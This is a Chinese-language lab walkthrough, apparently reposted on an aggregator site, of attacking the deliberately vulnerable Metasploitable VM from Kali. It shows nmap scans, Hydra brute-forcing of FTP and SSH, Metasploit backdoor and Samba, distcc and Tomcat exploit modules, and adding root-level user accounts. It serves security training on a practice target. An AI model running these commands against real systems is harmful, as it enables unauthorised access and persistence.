手把手教你kali渗透Metasploitable

这篇具有很好参考价值的文章主要介绍了手把手教你kali渗透Metasploitable。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

记一次kali渗透Metasploitbale靶机

1.网络设置

手把手教你kali渗透Metasploitable

2.ifconfig查看Metasploitable的IP:

手把手教你kali渗透Metasploitable

3.对Metasploitbale进行nmap端口扫描:

Nmap 192.168.22.128

手把手教你kali渗透Metasploitable

端口爆破:FTP、SSH等

工具:Hydra

备用字典:user.txt: 手把手教你kali渗透Metasploitable

pass,txt: 手把手教你kali渗透Metasploitable

一、 爆破FTP

手把手教你kali渗透Metasploitable

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt  ftp://192.168.22.128

//注意路径是桌面还是Desktop

手把手教你kali渗透Metasploitable

二、 爆破SSH

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt 192.168.22.128 ssh

手把手教你kali渗透Metasploitable

利用爆破得到的用户名和密码,进行远程连接测试:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

成功连接:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

三、端口渗透:

利用metasploit 然后在kali linux中进行渗透:

启动msf msfconsole

手把手教你kali渗透Metasploitable

1.端口1: 1524—ingrelock_backdoor

利用telnet连接1524,直接返回root会话

手把手教你kali渗透Metasploitable

创建用户ss

手把手教你kali渗透Metasploitable
成功:
手把手教你kali渗透Metasploitable

2.端口2、1099—distcc程序漏洞—ingrelock

利用metasploit并设置靶机ip进行爆破
手把手教你kali渗透Metasploitable

报错,提示未设置payload:

手把手教你kali渗透Metasploitable

设置payload:

 set payload cmd/unix/bind_perl

获取到daemon权限:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

3.端口3、139—samba为3.0漏洞

先用nmap进行详细扫描

 nmap -v -A -T4 192.168.22.128

手把手教你kali渗透Metasploitable

再用scanner模块进行端口扫描

手把手教你kali渗透Metasploitable

全端口版本检测:

nmap -sV 192.168.22.128

手把手教你kali渗透Metasploitable

发现Samba

利用metasploit

手把手教你kali渗透Metasploitable

利用 exploit/multi/samba/usermap_script

手把手教你kali渗透Metasploitable

Set rhost 192.168.22.128  //设置靶机ip
Exploit

输入whoami,可以看到已经获取到root权限。
手把手教你kali渗透Metasploitable

useradd -m ht -p ht   // 创建用户名为ht的用户

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

4.端口4: 6667—irc_3281_backdoor

登录msf ,search irc 找到对应得模块

手把手教你kali渗透Metasploitable

利用该模块exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/irc/unreal_ircd_3281_backdoor
Show options

手把手教你kali渗透Metasploitable

设置靶机名 进行漏洞利用 exploit ,

未成功,提示A payload has not been selected
手把手教你kali渗透Metasploitable

设置payload:

set payload cmd/unix/bind_perl

成功获取root权限
手把手教你kali渗透Metasploitable

创建用户aa

手把手教你kali渗透Metasploitable手把手教你kali渗透Metasploitable

5.端口5 6200—vsftpd_234_backdoor

利用metasploit 找到利用模块

手把手教你kali渗透Metasploitable

利用该模块:

use exploit/unix/ftp/vsftpd_234_backdoor  
show options

手把手教你kali渗透Metasploitable

设置靶机名,进行漏洞利用

获取到root权限

手把手教你kali渗透Metasploitable

useradd -m ht1 -p aa  //创建用户ht1

手把手教你kali渗透Metasploitable
手把手教你kali渗透Metasploitable

6.端口6:8180—Apache Tomcat弱口令

在终端中输入命令“nmap –sV 192.168.22.128”,对目标主机进行端口扫描,发现开放8180端口并且运行 着ApacheTomcat/CoyoteJSP engine1.1。

手把手教你kali渗透Metasploitable
利用该模块:

search tomcat   //搜索tomcat的相关工具和攻击载荷
use auxiliary/scanner/http/tomcat_mgr_login  //启用漏洞利用模块, 提示符就会提示进入到该路径下

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

set rhost 192.168.22.128    //设置攻击目标主机IP
set rport 8180     //设置攻击目标主机端口号
exploit   //实施攻击

获得用户名tomcat,密码tomcat。

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

也可用另一种方式获取到tomcat用户名和密码(这里不做展示):使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破 用默认自带的字典即可,如果用桌面上字典 则需要设置set PASS_FILE ‘root/Desktop/password.txt’ & set USER_FILE ‘root/Desktop/user.txt’,然后设置主机名和端口(同上)->show options->run即可。

获取到用户名和密码后使用deploy模块进行攻击:

手把手教你kali渗透Metasploitable

 use exploit/multi/http/tomcat_mgr_deploy

报错:

手把手教你kali渗透Metasploitable

查看payloads

手把手教你kali渗透Metasploitable

设置payload:
手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

设置靶机ip和端口以及用户名和密码

手把手教你kali渗透Metasploitable成功获取到tomcat会话:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

也可以如下图设置:

手把手教你kali渗透Metasploitable
**如果对你有帮助的话,希望可以点赞、收藏或关注哦! **文章来源地址https://www.toymoban.com/news/detail-462906.html

到了这里,关于手把手教你kali渗透Metasploitable的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 手把手教你实战TDD

    领域驱动设计,测试驱动开发。 我们在《手把手教你落地DDD》一文中介绍了领域驱动设计(DDD)的落地实战,本文将对测试驱动开发(TDD)进行探讨,主要内容有:TDD基本理解、TDD常见误区、TDD技术选型,以及案例实战。希望通过本文,读者能够理解掌握TDD并将其应用于实际

    2024年02月08日
    浏览(45)
  • 手把手教你做主成分分析

    主成分分析是一种降维处理的统计方法,实践中有三个应用场景: 信息浓缩:将多个分析项浓缩成几个关键概括性指标; 权重计算:利用方差解释率值计算各概括性指标的权重; 综合评价:基于主成分得分构造综合得分数据,用于综合评价。 接下来,以一个具体案例来学习

    2024年02月01日
    浏览(57)
  • 手把手教你落地DDD

    一、前言 常见的DDD实现架构有很多种,如经典四层架构、六边形(适配器端口)架构、整洁架构(Clean Architecture)、CQRS架构等。架构无优劣高下之分,只要熟练掌握就都是合适的架构。本文不会逐个去讲解这些架构,感兴趣的读者可以自行去了解。 本文将带领大家从日常的

    2024年02月16日
    浏览(49)
  • 手把手教你写go单元测试

    ​ 在 Go 语言中,单元测试是一种测试方法,用于验证代码的某个独立单元是否按预期功能,它的目的是确保代码的每个组成部分都在独立测试的情况下运行正常。 ​ 在我们对项目新增一个新功能时,最好就要养成写单元测试的好习惯,这样可以有助于提高我们代码的质量、

    2024年04月14日
    浏览(45)
  • 手把手教你Linux的网络配置

    目录 网络连接测试 测试Linux虚拟机是否与主机连接 测试主机是否与虚拟机连接 网络连接模式 桥接模式 NAT模式 仅主机模式 修改静态IP 修改 IP 地址后可能会遇到的问题 配置主机名 测试Linux虚拟机是否与主机连接 首先可以在windows界面,windows + R键输出cmd打开命令行,输入  

    2024年02月03日
    浏览(52)
  • 手把手教你小程序反编译

    1.反编译工具unveilr :百度网盘链接:https://pan.baidu.com/s/10Wle8CwvBq54GPWcbEnxLQ 提取码:bivh   解压即可用。 2.微信开发者工具:https://developers.weixin.qq.com/miniprogram/dev/devtools/stable.html 1.获取小程序存储文件夹 (1)打开PC端微信设置,在文件管理中找到存储路径,选择打开文件夹。

    2024年04月12日
    浏览(42)
  • 手把手教你怎么写顺序表

    目录 一、顺序表有什么功能? 二、实现顺序表的各个功能 1.前置准备 2.初始化顺序表 3.顺序表扩容 4.打印顺序表 5.增加顺序表成员 5.1尾增 5.2头增  6.删除顺序表中成员的内容 6.1尾删 6.2头删  7.查找成员  8.修改(替换) 9.插入(在目标位置插入成员) 10.定向删除(将目标位置的成

    2024年02月15日
    浏览(64)
  • 手把手教你如何使用SimiliarWeb

    在之前的“手把手教你如何使用Google Trends”文章中我们讲到从事跨境电商的卖家第一步遇到的问题是“客户在哪里?”该如何推广我的产品?因此若想自己的店铺做大做好,则需要工具来帮助分析市场行情,根据市场行情调整自己的业务状况。小编在上篇中已经讲解了三个特

    2024年02月09日
    浏览(61)
  • 手把手教你如何使用Docker

    我们在公司开发中,会有开发环境,测试环境,上线环境, 比如我们开发人员开发好了一个项目,在开发环境中运行正常,但测试人员拉到测试环境就跑不起来【jdk版本等】,或者上线的时候运行不起来,这时候就要为每个机器配置一个环境,那运维人员不得累死?【哈哈,

    2024年02月10日
    浏览(66)
  • 手把手教你玩Hugging Face

    Hugging Face起初是一家总部位于纽约的聊天机器人初创服务商,他们本来打算创业做聊天机器人,然后在github上开源了一个Transformers库,虽然聊天机器人业务没搞起来,但是他们的这个库在机器学习社区迅速大火起来。目前已经共享了超100,000个预训练模型,10,000个数据集,变成

    2024年02月06日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包